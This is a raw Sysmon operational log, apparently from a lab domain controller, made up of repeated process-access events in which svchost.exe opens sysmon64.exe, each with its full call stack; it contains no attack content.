12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
